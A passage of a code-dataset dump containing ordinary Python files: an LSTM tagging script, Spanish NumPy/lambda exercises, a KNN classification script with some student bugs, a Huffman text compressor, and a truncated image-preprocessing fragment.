1)\n y_enci.append(v)\n\n\nX_enc = pad_sequences(X_enc, maxlen=maxlen, padding=\"post\", value=word2ind[\"\"] )\ny_enc = pad_sequences(y_enci, maxlen=maxlen, padding=\"post\")\n\ntrain_len=int(len(X_enc))\n\nX_train = X_enc[:train_len]\ny_train = y_enc[:train_len]\n\n\n\n### READ DEV ###\nif no_question==1:\n\traw = codecs.open('dev2012_nq', 'r', \"ISO-8859-1\").readlines()\nelse:\n\traw = codecs.open('dev2012', 'r', \"ISO-8859-1\").readlines()\n\nprint (raw[1])\nenv = []\nfor line in raw:\n stripped_line = line.split()\n #print (stripped_line)\n env.append(stripped_line)\n\nall_x_dev=[]\nfor i in(range(len(env))):\n if (len(env[i])==2):\n all_x_dev.append(env[i])\n else:\n print (env[i])\n\nX = [x[0] for x in all_x_dev]\ny = [x[1] for x in all_x_dev]\n\nall_text = [c for x in X for c in x]\n\nx_dev=[]\ny_dev=[]\nfor group in chunker(X, chunk_size):\n x_dev.append(group)\nfor group in chunker(y, chunk_size, is_y=True):\n y_dev.append(group)\n\n\nprint ('Vocabulary size:', len(word2ind), len(label2ind))\n\nmaxlen_ = max([len(x) for x in x_dev])\nprint ('Maximum sequence length:', maxlen)\n### TRANSFORM TEXTS #\n\nfor i, sent in enumerate(x_dev):\n x_dev[i] = [w if w in word2ind else unknown_token for w in sent]\n\nX_enc = [[word2ind[c] for c in x] for x in x_dev]\nmax_label = max(label2ind.values())+1\ny_enc = [[0] * (maxlen - len(ey)) + [label2ind[c] for c in ey] for ey in y_dev]\n\ny_enc = [[encode(c, max_label) for c in ey] for ey in y_enc]\n\ny_enci =[]\nfor i in (range(len(y_enc))):\n a=y_enc[i]\n v=np.array(a)\n v=np.delete(v, 0, 1)\n y_enci.append(v)\n\nprint (len(y_enci))\nprint (y_enci[0].shape)\n\nX_enc = pad_sequences(X_enc, maxlen=maxlen, padding=\"post\", value=word2ind[\"\"] )\ny_enc = pad_sequences(y_enci, maxlen=maxlen, padding=\"post\")\n\nval_len=int(len(X_enc)*1.0)\nX_val = X_enc[:val_len]\ny_val = y_enc[:val_len]\n\n\n### READ TEST ###\nif no_question==1:\n\traw = codecs.open('test2011_nq', 'r', \"ISO-8859-1\").readlines()\nelse:\n\traw = codecs.open('test2011', 'r', \"ISO-8859-1\").readlines()\n\nprint (raw[1])\nall_x_test = []\nfor line in raw:\n stripped_line = line.split()\n #print (stripped_line)\n all_x_test.append(stripped_line)\n\nX = [x[0] for x in all_x_test]\ny = [x[1] for x in all_x_test]\n\nall_text = [c for x in X for c in x]\n\nx_test=[]\ny_test=[]\nfor group in chunker(X, chunk_size):\n x_test.append(group)\nfor group in chunker(y, chunk_size, is_y=True):\n y_test.append(group)\n\n### TRANSFORM TEXTS #\nfor i, sent in enumerate(x_test):\n x_test[i] = [w if w in word2ind else unknown_token for w in sent]\n\nX_enc = [[word2ind[c] for c in x] for x in x_test]\n\ny_enc = [[0] * (maxlen - len(ey)) + [label2ind[c] for c in ey] for ey in y_test]\n\ny_enc = [[encode(c, max_label) for c in ey] for ey in y_enc]\n\ny_enci =[]\nfor i in (range(len(y_enc))):\n a=y_enc[i]\n v=np.array(a)\n v=np.delete(v, 0, 1)\n y_enci.append(v)\n\nX_enc = pad_sequences(X_enc, maxlen=maxlen, padding=\"post\", value=word2ind[\"\"] )\ny_enc = pad_sequences(y_enci, maxlen=maxlen, padding=\"post\")\n\ntest_len=int(len(X_enc)*1.0)\n\nX_test = X_enc[:test_len]\ny_test = y_enc[:test_len]\n\n### READ TEST ASR###\nif no_question==1:\n\traw = codecs.open('test2011asr_nq', 'r', \"ISO-8859-1\").readlines()\nelse:\n\traw = codecs.open('test2011asr', 'r', \"ISO-8859-1\").readlines()\n\nall_x_test_asr = []\nfor line in raw:\n stripped_line = line.split()\n all_x_test_asr.append(stripped_line)\n\nX = [x[0] for x in all_x_test_asr]\ny = [x[1] for x in all_x_test_asr]\n\nall_text = [c for x in X for c 
in x]\n\nx_test_asr=[]\ny_test_asr=[]\nfor group in chunker(X, chunk_size):\n x_test_asr.append(group)\nfor group in chunker(y, chunk_size, is_y=True):\n y_test_asr.append(group)\n\n### TRANSFORM TEXTS #\nfor i, sent in enumerate(x_test_asr):\n x_test_asr[i] = [w if w in word2ind else unknown_token for w in sent]\n\nX_enc = [[word2ind[c] for c in x] for x in x_test_asr]\nmax_label = max(label2ind.values())+1\ny_enc = [[0] * (maxlen - len(ey)) + [label2ind[c] for c in ey] for ey in y_test_asr]\n\ny_enc = [[encode(c, max_label) for c in ey] for ey in y_enc]\ny_enci =[]\nfor i in (range(len(y_enc))):\n a=y_enc[i]\n v=np.array(a)\n v=np.delete(v, 0, 1)\n y_enci.append(v)\n\nX_enc = pad_sequences(X_enc, maxlen=maxlen, padding=\"post\", value=word2ind[\"\"] )\ny_enc = pad_sequences(y_enci, maxlen=maxlen)\n\ntest_asr_len=int(len(X_enc)*1.0)\n\nX_test_asr = X_enc[:test_asr_len]\ny_test_asr = y_enc[:test_asr_len]\nprint (len(X_test_asr))\n\n\n\nmax_features = len(word2ind)\nout_size = len(label2ind)\n\n### CREATE EMBEDDING ###\nnb_words = min(vocabulary_size, len(word2ind))\nprint (nb_words)\nprint (embedding_size)\n\nembedding_matrix = np.zeros((nb_words + 3, embedding_size))\nfor word, i in word2ind.items():\n if i > nb_words:\n continue\n embedding_vector = embeddings_index.get(word)\n if embedding_vector is not None: # Initialized embedding_vector\n embedding_matrix[i] = embedding_vector\n\nprint ('Number of remaining lines from embedding matrix:', len(embedding_matrix))\n### CREATE RNN model with LSTM ###\nmodel = Sequential()\nmodel.add(Embedding(nb_words+3, embedding_size, input_length=maxlen,weights=[embedding_matrix],mask_zero=True))\nmodel.add(LSTM(hidden_size, return_sequences=True,init='glorot_normal'))\nmodel.add(TimeDistributedDense(out_size))\nmodel.add(Activation('softmax'))\n\nearlyStopping=keras.callbacks.EarlyStopping(monitor='val_loss',patience=patience_,verbose=0)\nmodel.compile(loss='categorical_crossentropy', optimizer=optimizer_, metrics=['accuracy','precision','recall','fmeasure'])\nmodel.fit(X_train, y_train, batch_size=batch_size, nb_epoch=100, validation_data=(X_val, y_val),callbacks=[earlyStopping], shuffle=True)\nscore_model = model.evaluate(X_test, y_test, batch_size=batch_size)\nprint('Raw test score:', score_model)\n\n\n### EVALUATION TRAIN ###\npr = model.predict_classes(X_train)\nyh = y_train.argmax(2)\nfyh, fpr = score(yh, pr)\nprint ('Training accuracy:', accuracy_score(fyh, fpr))\nprint ('Training confusion matrix:')\nprint (confusion_matrix(fyh, fpr))\nprint (classification_report(fyh,fpr))\n\n### EVALUATION DEV ###\npr = model.predict_classes(X_val)\nyh = y_val.argmax(2)\nfyh, fpr = score(yh, pr)\nprint ('Validation accuracy:', accuracy_score(fyh, fpr))\nprint ('Validation confusion matrix:')\nprint (confusion_matrix(fyh, fpr))\nprint (classification_report(fyh,fpr))\n\n### EVALUATION TEST ###\n# In[51]:\n\npr =model.predict_classes(X_test)\nyh = y_test.argmax(2)\nfyh, fpr = score(yh, pr)\nprint ('Testing accuracy:', accuracy_score(fyh, fpr))\nprint ('Testing confusion matrix:')\nprint (confusion_matrix(fyh, fpr))\nprint (classification_report(fyh,fpr))\n\n\n### EVALUATION TEST ASR###\npr =model.predict_classes(X_test_asr)\nyh = y_test_asr.argmax(2)\nfyh, fpr = score(yh, pr)\nprint ('Testing ASR accuracy:', accuracy_score(fyh, fpr))\nprint ('Testing ASR confusion matrix:')\nprint (confusion_matrix(fyh, fpr))\nprint 
(classification_report(fyh,fpr))\n","sub_path":"uniLSTM_GLOVE_EN.py","file_name":"uniLSTM_GLOVE_EN.py","file_ext":"py","file_size_in_byte":11122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"525359151","text":"#!/usr/bin/env python\r\n'''\r\nNumpy [Python]\r\nEjercicios de práctica\r\n---------------------------\r\nAutor: Inove Coding School\r\nVersion: 1.2\r\n\r\nDescripcion:\r\nPrograma creado para poner a prueba los conocimientos\r\nadquiridos durante la clase\r\n'''\r\n\r\n__author__ = \"Emmanuel Oscar Torres Molina\"\r\n__email__ = \"emmaotm@gmail.com\"\r\n__version__ = \"1.2\"\r\n\r\nimport numpy as np\r\nimport math\r\nimport random\r\nfrom random import randrange\r\n\r\n\r\ndef ej1():\r\n # Lambda expression\r\n # 1)\r\n # Realizar una funcion lambda que eleve al cuadrado\r\n # el número pasado como parámetro\r\n\r\n # potencia_2 = lambda x:......\r\n # pot_3 = potencia_2(3)\r\n\r\n numero = float(input('\\n\\nIngrese un Número: '))\r\n potencia_2 = lambda x: x**2\r\n potencia_numero = potencia_2(numero)\r\n print('\\nLa Potencia de 2 del Número Ingresado es: {}\\n\\n'.format(potencia_numero))\r\n\r\n # 2)\r\n # Utilice la función map para mapear una lambda expression\r\n # que retorne la potencia de 2 de cada numero en la lista numeros\r\n # El resultado (la potencia de cada numero) se debe ir almacenando\r\n # en una nueva lista\r\n # Nota: realizar la lambda expression \"in line\", es decir,\r\n # no declarar la lambda fuera del map sino diretamente dentro\r\n # Copiar la lambda creada en el paso anterior dentro del map\r\n # NOTA: No debe usar \"potencia_2\" dentro del map, debe colocar\r\n # directamente la lambda.\r\n\r\n # Lista de numeros\r\n numeros = [1, -5, 4, 3]\r\n\r\n # numeros_potencia = list(map....)\r\n numeros_potencia = list(map(lambda x: x**2, numeros))\r\n print('Lista Original: {}'.format(numeros))\r\n print('La Lista de Números Elevados al Cuadrado: {}\\n\\n'.format(numeros_potencia))\r\n\r\n\r\ndef ej2():\r\n # Lambda expression\r\n # 1)\r\n # Realizar una funcion lambda que retorne el tamaño\r\n # (len) de un string pasado como parámetro\r\n\r\n string = str(input('\\n\\nIngrese una Cadena de Caracteres: '))\r\n\r\n # len_string = lambda......\r\n len_string = (lambda x: len(x))(string)\r\n print('La Cadena de Caracteres que Ingresó posee {} Caracteres.\\n\\n'.format(len_string))\r\n\r\n # 2)\r\n # Lista de string\r\n palabras = ['Inove', 'casa', 'programacion']\r\n\r\n # Utilice la función map para mapear una lambda expression\r\n # que retorne el tamaño (len) de cada texto em cata iteración\r\n # de la lista de textos\r\n # El resultado (el len de cada palabra) se debe ir almacenando\r\n # en una nueva lista\r\n # Nota: realizar la lambda expression \"in line\"\r\n # Copiar la lambda creada en el paso anterior dentro del map\r\n # NOTA: No debe usar \"len_string\" dentro del map, debe colocar\r\n # directamente la lambda.\r\n\r\n # palabras_len = list(map....)\r\n palabras_len = list(map(lambda x: len(x), palabras))\r\n print('Lista Original: {}'.format(palabras))\r\n print('El Tamaño de Cada elemento de la Lista Original es: {}\\n\\n'.format(palabras_len))\r\n\r\n\r\n\r\ndef ej3():\r\n # Práctica de comprensión de listas\r\n # 1)\r\n # Generar una lista a partir de comprensión de listas,\r\n # esta lista generada deberá tener un tamaño de 11\r\n # números, conteniendo del 0 al 10 inclusive\r\n\r\n # lista_0_10 = [......]\r\n lista_0_10 = [numero for numero in range(0, 11)] # Compresión de 
\r\n\r\ndef ej3():\r\n # List comprehension practice\r\n # 1)\r\n # Using a list comprehension, generate a list\r\n # of size 11 containing the numbers 0 to 10 inclusive.\r\n\r\n # lista_0_10 = [......]\r\n lista_0_10 = [numero for numero in range(0, 11)] # list comprehension\r\n print('\\n\\nThe generated list is: {}\\n\\n'.format(lista_0_10))\r\n\r\n # 2)\r\n # Using a list comprehension, generate a list that contains\r\n # the 5 times table, from multiple 0 to multiple 10.\r\n # The expected result is:\r\n # [0 5 10 15 20 25 30 35 40 45 50]\r\n # The idea is to build a list of 11 elements, 0 to 10\r\n # (as in the previous exercise), multiplying each element by 5.\r\n\r\n # tabla_5 = [......]\r\n tabla_5 = [(numero * 5) for numero in range(0, 11)]\r\n print('\\n\\nThe generated list is: {}\\n\\n'.format(tabla_5))\r\n\r\n\r\n # 3)\r\n # Using a list comprehension, generate a list of 10 random\r\n # numbers in the range 1 to 30, representing possible days\r\n # of a month (numbers may repeat).\r\n # NOTE: import the random module and use randrange\r\n # or randint to generate the random numbers.\r\n # https://docs.python.org/3/library/random.html\r\n\r\n # dias_mes = [.....]\r\n dias_mes = [randrange(1, 31) for dia in range(10)] # fixed: range(0, 11) produced 11 numbers instead of the requested 10\r\n print('The generated list is: {}\\n\\n'.format(dias_mes))\r\n\r\n\r\ndef ej4():\r\n # List comprehensions with conditionals\r\n\r\n # 1)\r\n # Use a list comprehension to convert a list of numbers\r\n # given as str into numbers of type int -- a string --> int\r\n # converter.\r\n # Careful! Watch out for strings/characters that are not\r\n # numbers: use a conditional to detect them and replace any\r\n # such non-numeric str with 0.\r\n # TIP: see the string method \"isdigit\" for this case.\r\n list_numeros_str = ['5', '2', '3', '', '7', 'NaN']\r\n conv_str_int = [(int(elemento) if elemento.isdigit() else 0) for elemento in list_numeros_str]\r\n print('\\n\\nOriginal list: {}'.format(list_numeros_str))\r\n print('The original list converted to a list of numbers is: {}\\n\\n'.format(conv_str_int))\r\n\r\n # Finished the exercise already? Why not try making one of\r\n # the numbers in the list negative?\r\n # What happens with isdigit? Surprising, isn't it?\r\n
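\r\n # (Editor's note, added) Illustrative alternative, not part of the original\r\n # exercise: a try/except conversion also accepts negative numbers, which\r\n # str.isdigit() rejects.\r\n def to_int_safe(s):\r\n try:\r\n return int(s)\r\n except ValueError:\r\n return 0\r\n print('try/except version: {}\\n\\n'.format([to_int_safe(e) for e in list_numeros_str]))\r\n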
\r\n list_numeros_str = ['-5', '2', '-3', '', '7', 'NaN'] \r\n conv_str_int = [(int(elemento) if elemento.isdigit() else 0) for elemento in list_numeros_str]\r\n print('Original list: {}'.format(list_numeros_str))\r\n print('The original list converted to a list of numbers is: {}'.format(conv_str_int))\r\n print('Note that if a number in the original list is made negative, the \"isdigit()\" method does not treat it as a number.\\n\\n')\r\n\r\n\r\ndef ej5():\r\n # Use list comprehensions to filter\r\n\r\n accesos = [10, 50, 7, 5, 15, 25, 3, 4, 13]\r\n\r\n # The list accesos contains the staff ID numbers\r\n # that entered through this turnstile.\r\n\r\n # 1)\r\n # From the list \"accesos\", build a list by comprehension that\r\n # only contains (filters) the staff IDs between 1 and 10\r\n # inclusive; we want to separate the IDs between 1 and 10\r\n # from the group of accesses.\r\n # From the resulting list, report how many people with IDs\r\n # in that range passed through this turnstile.\r\n\r\n # personal_1_10 = [.....]\r\n personal_1_10 = [id for id in accesos if (1 <= id <= 10)]\r\n print('\\n\\nThe list of staff accesses is: {}'.format(accesos))\r\n print('The filtered list is: {}'.format(personal_1_10))\r\n print('The number of staff who entered through this turnstile is: {} people.\\n\\n'.format(len(personal_1_10)))\r\n\r\n # 2)\r\n # From the list \"accesos\", build a list by comprehension with\r\n # the staff IDs that are among the IDs allowed to enter\r\n # through this turnstile:\r\n id_validos = [3, 4, 7, 8, 15]\r\n # Build a new list based on \"accesos\" filtered by the IDs\r\n # approved in \"id_validos\".\r\n # TIP: use the \"in\" operator to check whether an ID from\r\n # accesos is in \"id_validos\".\r\n\r\n # personal_valido = [.....]\r\n personal_valido = [id for id in accesos if (id in id_validos)]\r\n print('The list of valid IDs is: {}\\n\\n'.format(personal_valido))\r\n
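\r\n# (Editor's note, added) Illustrative cross-check for ej5, not part of the\r\n# original exercises: the same filtering written with filter() and a lambda.\r\ndef ej5_extra():\r\n accesos = [10, 50, 7, 5, 15, 25, 3, 4, 13]\r\n id_validos = [3, 4, 7, 8, 15]\r\n personal_valido = list(filter(lambda i: i in id_validos, accesos))\r\n print('filter() gives the same result: {}\\n\\n'.format(personal_valido))\r\n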
\r\n\r\ndef ej6():\r\n # Numpy function exercises\r\n # Build an array with np.arange, bounded between 0 and 1000.\r\n # On that array compute the following operations:\r\n\r\n # 1)\r\n # Compute the sum of all elements in the array\r\n # using numpy's \"sum\" method.\r\n\r\n # suma = ....\r\n array_int = np.arange(0, 1000)\r\n print('\\n\\nThe list of numbers is:\\n{}'.format(array_int))\r\n suma = np.sum(array_int)\r\n print('\\nThe sum of the numbers in the list is: {}\\n\\n'.format(suma))\r\n\r\n # 2)\r\n # Compute the difference of consecutive elements in the array\r\n # using numpy's \"diff\" method.\r\n\r\n # diferencia = ....\r\n diferencia = np.diff(array_int)\r\n print('The differences of the numbers in the list are:\\n{}\\n\\n'.format(diferencia))\r\n\r\n # 3)\r\n # Use the \"where\" function to replace the multiples of \"5\"\r\n # with a \"0\".\r\n # Hint: which mathematical operator tells you whether a number\r\n # is a multiple of \"5\"? You already know that operator and have\r\n # used it a lot to test whether a number is a multiple of \"2\".\r\n\r\n # nuevo_array = ....\r\n nuevo_array = np.where((array_int % 5) != 0, array_int, 0) \r\n print('The new list with the multiples of 5 replaced by 0 is:\\n{}\\n\\n'.format(nuevo_array))\r\n\r\n\r\nif __name__ == '__main__':\r\n print(\"\\n\\nWelcome to another Inove class with Python\")\r\n ej1()\r\n ej2()\r\n ej3()\r\n ej4()\r\n ej5()\r\n ej6()\r\n","sub_path":"ejercicios_practica.py","file_name":"ejercicios_practica.py","file_ext":"py","file_size_in_byte":9045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"94698218","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Oct 16 11:59:10 2019\r\n\r\n@author: guptap\r\n\"\"\"\r\n\r\n# K-Nearest Neighbours classification (the original header said \"Logistic Regression\", which this file does not use)\r\n\r\nfrom itertools import permutations\r\nfrom collections import Counter\r\n\r\n# Importing the libraries\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom sklearn import metrics\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\n\r\n# Importing the dataset\r\ndataset = pd.read_csv(r'E:\CS400 Fall 2019\breast_cancer_dataset.csv') #Prediction\r\ndataset = dataset.dropna()\r\ndataset = dataset.reset_index(drop=True)\r\ncolNames = dataset.columns.values.tolist()\r\n\r\nscoringList = []\r\ncolumnList1 = []\r\ncolumnList2 = []\r\n\r\na = np.arange(0,7,1)\r\nperm = list(permutations(a, 2))\r\n\r\nfor i in perm: \r\n X = dataset.iloc[:, [i[0], i[1]]].values\r\n y = dataset.iloc[:, 9].values\r\n \r\n # Splitting the dataset into the Training set and Test set\r\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.25, random_state = 0)\r\n \r\n # Feature Scaling\r\n sc = StandardScaler()\r\n X_train = sc.fit_transform(X_train)\r\n X_test = sc.transform(X_test)\r\n \r\n # Fitting K-NN to the Training set; reset the score list for every feature\r\n # pair (the original accumulated scores across pairs, which made the\r\n # argmax index below meaningless)\r\n knn_scores = []\r\n for k in range(1,21):\r\n knn_classifier = KNeighborsClassifier(n_neighbors = k)\r\n knn_classifier.fit(X_train, y_train)\r\n knn_scores.append(knn_classifier.score(X_test, y_test))\r\n \r\n ind = np.argmax(knn_scores)\r\n \r\n classifier = KNeighborsClassifier(n_neighbors = ind+1, metric = 'minkowski', p = 2)\r\n classifier.fit(X_train, y_train)\r\n \r\n # Predicting the Test set results\r\n y_pred = classifier.predict(X_test)\r\n \r\n # calculate accuracy (was metrics.accuracy_score(y_test,y_predict), with\r\n # metrics unimported and y_predict undefined)\r\n scoring = metrics.accuracy_score(y_test, y_pred)\r\n \r\n # append the feature pair once (the original appended it twice, so the\r\n # column lists ran out of step with scoringList)\r\n columnList1.append(i[0])\r\n columnList2.append(i[1])\r\n scoringList.append(scoring)\r\n \r\nind = np.argmax(scoringList)\r\nprint (columnList1[ind],columnList2[ind] )\r\n\r\nfreq = Counter(scoringList)\r\nfinalColums = np.where(np.array(scoringList) == np.max(scoringList)) # all feature pairs reaching the best accuracy\r\nprint(finalColums)\r\n","sub_path":"Classification/10 25/Oct 25th Classification KNN.py","file_name":"Oct 25th Classification KNN.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"47183579","text":"import os, sys, heapq\r\n\r\nclass HuffmanNode:\r\n\tdef __init__(self, freq, char=None, left=None, right=None):\r\n\t\tself.freq = freq\r\n\t\tself.char = char\r\n\t\tself.left = left\r\n\t\tself.right = right\r\n\r\n\tdef __lt__(self, other):\r\n\t\treturn self.freq < other.freq\r\n\r\n\tdef isLeafNode(self):\r\n\t\treturn self.left == None and self.right == None\r\n\r\n\r\nclass HuffmanEncoder:\r\n\tdef __init__(self, source, dest):\r\n\t\tself.input_file = 
open(source, 'r')\r\n\t\tself.input_file.seek(0, 2)\r\n\t\tself.EOF = self.input_file.tell()\r\n\t\tself.input_file.seek(0, 0)\r\n\t\tself.freqDict = {}\r\n\t\tself.HuffmanCodes = {}\r\n\t\tself.allChar = []\r\n\t\tself.output_file = open(dest, 'wb')\r\n\t\tself.root = None\r\n\r\n\tdef countCharFreq(self):\r\n\t\tadvance = True\r\n\t\twhile advance:\r\n\t\t\tchar = self.input_file.read(1)\r\n\t\t\tself.allChar.append(char)\r\n\t\t\tif char in self.freqDict:\r\n\t\t\t\tself.freqDict[char] += 1\r\n\t\t\telse:\r\n\t\t\t\tself.freqDict[char] = 1\r\n\r\n\t\t\tif(self.input_file.tell() == self.EOF):\r\n\t\t\t\tadvance = False\r\n\r\n\tdef buildHuffmanTree(self):\r\n\t\tnodes = []\r\n\t\tfor char in self.freqDict:\r\n\t\t\tnodes.append(HuffmanNode(self.freqDict[char], char))\r\n\r\n\t\theapq.heapify(nodes)\r\n\r\n\t\twhile(len(nodes) > 1):\r\n\t\t\tleft_child = heapq.heappop(nodes)\r\n\t\t\tright_child = heapq.heappop(nodes)\r\n\t\t\tblank_parent_node = HuffmanNode(left_child.freq + right_child.freq, left=left_child, right=right_child)\r\n\t\t\theapq.heappush(nodes, blank_parent_node)\r\n\r\n\t\treturn heapq.heappop(nodes)\r\n\r\n\tdef inOrderHuffmanCode(self, rootNode, binary_code_str=''):\r\n\t\tif rootNode != None:\r\n\t\t\tself.inOrderHuffmanCode(rootNode.left, binary_code_str + '0')\r\n\t\t\tif rootNode.isLeafNode():\r\n\t\t\t\tself.HuffmanCodes[rootNode.char] = binary_code_str\r\n\t\t\tself.inOrderHuffmanCode(rootNode.right, binary_code_str + '1')\r\n\r\n\tdef encodeFile(self):\r\n\t\tdef toBytes(encoded_string):\r\n\t\t\tbyte = bytearray()\r\n\t\t\tfor i in range(0, len(encoded_string), 8):\r\n\t\t\t\tbyte.append(int(encoded_string[i:i+8], 2))\r\n\t\t\treturn bytes(byte)\r\n\r\n\t\tdef encodeHuffmanTree(node, encoded_tree):\r\n\t\t\tif node.char is not None:\r\n\t\t\t\tencoded_tree += \"1\"\r\n\t\t\t\tencoded_tree += \"{0:08b}\".format(ord(node.char))\r\n\t\t\telse:\r\n\t\t\t\tencoded_tree += \"0\"\r\n\t\t\t\tencoded_tree = encodeHuffmanTree(node.left, encoded_tree)\r\n\t\t\t\tencoded_tree = encodeHuffmanTree(node.right, encoded_tree)\r\n\t\t\treturn encoded_tree\r\n\r\n\t\tdef padEncodedString(self, encoded_string):\r\n\t\t\tencoded_tree = encodeHuffmanTree(self.root, \"\")\r\n\t\t\tpadding = 8 - (len(encoded_string) + len(encoded_tree)) % 8\r\n\t\t\tfor i in range(padding):\r\n\t\t\t\tencoded_string += \"0\"\r\n\r\n\t\t\tpadded_info = \"{0:08b}\".format(padding)\r\n\t\t\tencoded_string = encoded_tree + padded_info + encoded_string\r\n\t\t\treturn encoded_string\r\n\r\n\t\tencoded_string = ''\r\n\t\tfor char in self.allChar:\r\n\t\t\tencoded_string += self.HuffmanCodes[char]\r\n\r\n\t\tself.output_file.write(toBytes(padEncodedString(self, encoded_string)))\r\n\t\tself.output_file.close()\r\n\r\n\r\n\r\nclass HuffmanDecoder():\r\n\tdef __init__(self, source, dest):\r\n\t\tself.input_file = open(source, 'rb')\r\n\t\tself.output_file = open(dest, 'w')\r\n\r\n\tdef decodeFile(self):\r\n\t\tdef decodeHuffmanTree(binary_string):\r\n\t\t\tbit = binary_string[0]\r\n\t\t\tdel binary_string[0]\r\n\r\n\t\t\tif bit == \"1\":\r\n\t\t\t\tchar = \"\"\r\n\t\t\t\tfor x in range(8):\r\n\t\t\t\t\tchar += binary_string[0]\r\n\t\t\t\t\tdel binary_string[0]\r\n\r\n\t\t\t\treturn HuffmanNode(freq=None, char=chr(int(char, 2)))\r\n\t\t\treturn HuffmanNode(freq=None, left=decodeHuffmanTree(binary_string), right=decodeHuffmanTree(binary_string))\r\n\t\t\r\n\t\tdef removePadding(binary_string):\r\n\t\t\tpadding_info = binary_string[:8]\r\n\t\t\tpadding_len = int(\"\".join(padding_info), 
2)\r\n\r\n\t\t\tpadding_info_removed = binary_string[8:]\r\n\t\t\tpadding_removed_string = padding_info_removed[:-1*padding_len]\r\n\t\r\n\t\t\treturn padding_removed_string\r\n\r\n\t\tdef decodeText(encoded_string, rootNode):\r\n\t\t\tcurr_node = rootNode\r\n\t\t\tdecoded_string = ''\r\n\r\n\t\t\tfor char in encoded_string:\r\n\t\t\t\tcurr_node = curr_node.left if char == \"0\" else curr_node.right\r\n\r\n\t\t\t\tif curr_node.char is not None:\r\n\t\t\t\t\tdecoded_string += curr_node.char\r\n\t\t\t\t\tcurr_node = rootNode\r\n\r\n\t\t\treturn decoded_string\r\n\r\n\t\tbinary_string = ''\r\n\t\tbyte = self.input_file.read(1)\r\n\t\twhile(len(byte) > 0):\r\n\t\t\tbyte = ord(byte)\r\n\t\t\tbits = bin(byte)[2:].rjust(8, '0')\r\n\t\t\tbinary_string += bits\r\n\t\t\tbyte = self.input_file.read(1)\r\n\r\n\t\tbinary_string = list(binary_string)\r\n\t\trootNode = decodeHuffmanTree(binary_string)\r\n\t\tencoded_string = removePadding(binary_string)\r\n\t\tdecoded_string = decodeText(encoded_string, rootNode)\r\n\t\tself.output_file.write(decoded_string)\r\n\r\n\r\n\r\ndef printCompressionRate(input_path, output_path):\r\n\tinput_file_size = os.path.getsize(input_path)\r\n\toutput_file_size = os.path.getsize(output_path)\r\n\tcompression_rate = round((input_file_size - output_file_size)/input_file_size * 100)\r\n\tprint(\"Compression Successful. Details:\")\r\n\tprint(\"Original File Size: \", input_file_size)\r\n\tprint(\"Compressed File Size: \", output_file_size)\r\n\tprint(\"New File Is\", compression_rate, \"% Of The Original File.\\n\")\r\n\r\ndef runEncoder(encoder, input_path, output_path):\r\n\tencoder.countCharFreq()\r\n\theadNode = encoder.buildHuffmanTree()\r\n\tencoder.inOrderHuffmanCode(headNode)\r\n\tencoder.root = headNode\r\n\tencoder.encodeFile()\r\n\tprintCompressionRate(input_path, output_path)\r\n\r\ndef main():\r\n\tmode = sys.argv[1]\r\n\tinput_path = sys.argv[2]\r\n\tif mode == 'compress':\r\n\t\tif os.path.isfile(input_path):\r\n\t\t\toutput_path = input_path.split('.')[0] + 'Compressed.bin'\r\n\t\t\tencoder = HuffmanEncoder(input_path, output_path)\r\n\t\t\trunEncoder(encoder, input_path, output_path)\r\n\t\telse:\r\n\t\t\tfiles = [file for file in os.listdir(input_path) if file.endswith(\".txt\")]\r\n\t\t\tfor f in files:\r\n\t\t\t\toutput_path = input_path + '/' + f.split('.')[0] + 'Compressed.bin'\r\n\t\t\t\tencoder = HuffmanEncoder(input_path + '/' + f, output_path)\r\n\t\t\t\trunEncoder(encoder, input_path + '/' + f, output_path)\r\n\telif mode == 'decompress':\r\n\t\tif os.path.isfile(input_path):\r\n\t\t\toutput_path = input_path.split('.')[0][:-1*len('Compressed')] + 'Decompressed.txt'\r\n\t\t\tdecoder = HuffmanDecoder(input_path, output_path)\r\n\t\t\tdecoder.decodeFile()\r\n\t\t\tprint(\"Decompression Successful.\")\r\n\t\telse:\r\n\t\t\tfiles = [file for file in os.listdir(input_path) if file.endswith(\".bin\")]\r\n\t\t\tfor f in files:\r\n\t\t\t\toutput_path = input_path + '/' + f.split('.')[0][:-1*len('Compressed')] + 'Decompressed.txt'\r\n\t\t\t\tdecoder = HuffmanDecoder(input_path + '/' + f, output_path)\r\n\t\t\t\tdecoder.decodeFile()\r\n\t\t\t\tprint(\"Decompression Successful.\")\r\n\telse:\r\n\t\tprint('Invalid Mode.')\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\tmain()\r\n\r\n\r\n","sub_path":"huff.py","file_name":"huff.py","file_ext":"py","file_size_in_byte":6407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"225295926","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated 
on Wed Jul 28 00:27:41 2021\r\n\r\n@author: qiang\r\n\"\"\"\r\n\r\nimport cv2\r\ndef preprocess_observation_(observation, bit_depth):\r\n observation.div_(2 ** (8 - bit_depth)).floor_().div_(2 ** bit_depth).sub_(0.5) # Quantise to given bit depth and centre\r\n observation.add_(torch.rand_like(observation).div_(2 ** bit_depth)) # Dequantise (to approx. match likelihood of PDF of continuous images vs. PMF of discrete images)\r\n\r\n# Postprocess an observation for storage (from float32 numpy array [-0.5, 0.5] to uint8 numpy array [0, 255])\r\ndef postprocess_observation(observation, bit_depth):\r\n return np.clip(np.floor((observation + 0.5) * 2 ** bit_depth) * 2 ** (8 - bit_depth), 0, 2 ** 8 - 1).astype(np.uint8)\r\n\r\ndef _images_to_observation(images, bit_depth):\r\n # print(images)\r\n images = torch.tensor(cv2.resize(images, (128,128), interpolation=cv2.INTER_LINEAR).transpose(2, 0, 1), dtype=torch.float32) # Resize and put channel first\r\n preprocess_observation_(images, bit_depth) # Quantise, centre and dequantise inplace\r\n # return images.unsqueeze(dim=0) # Add batch dimension\r\n return images\r\n\r\ndef pre_pos(images):\r\n image = cv2.resize(images, 